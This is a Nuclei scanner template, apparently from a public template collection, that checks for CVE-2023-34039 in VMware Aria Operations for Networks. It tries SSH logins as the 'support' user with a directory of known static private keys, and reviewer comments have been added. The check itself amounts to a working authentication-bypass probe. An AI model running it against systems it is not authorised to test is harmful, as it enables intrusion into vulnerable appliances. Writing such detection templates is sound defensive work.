
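id: CVE-2023-34039

# Nuclei template (JavaScript protocol). The only probe performed is an SSH
# connection attempt with each private key loaded from `keysDir` (see the
# `init` block below); the DSL matcher fires when `ConnectWithKey` reports a
# successful connection, i.e. when the target still accepts one of the static
# keys described in the references.
info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.92573
    epss-percentile: 0.98742
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  # year tag matches the cve-id above (was `cve2019`, which did not match CVE-2023-34039)
  tags: packetstorm,cve,cve2023,vmware,aria,rce

variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory

javascript:
  # init field can be used to make any preparations before the actual exploit
  # here we are reading all private keys from helpers folder and storing them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)
    # check if port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)
    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful
    args:
      Host: "{{Host}}"
      # the SSH port is fixed to 22; hosts serving SSH elsewhere are not covered by this template
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"
    payloads:
      # 'keys' will be updated by actual private keys after init is executed
      keys:
        - dummy1
        - dummy2
    threads: 10
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - success && response
# NOTE(review): the digest below was computed over the original template text;
# any edit to this file (including this one) presumably requires re-signing the
# template, otherwise the digest no longer corresponds to the content — confirm.
# digest: 490a004630440220456df9f91b7d7bda27f61ae2652c2cc9f62e829e398cb921c906a38fc4a381a202205bee890d97b24387089b1080a9dce61d335c1b793571e0a63098a4b1e5126b17:922c64590222798bb761d5b6d8e72950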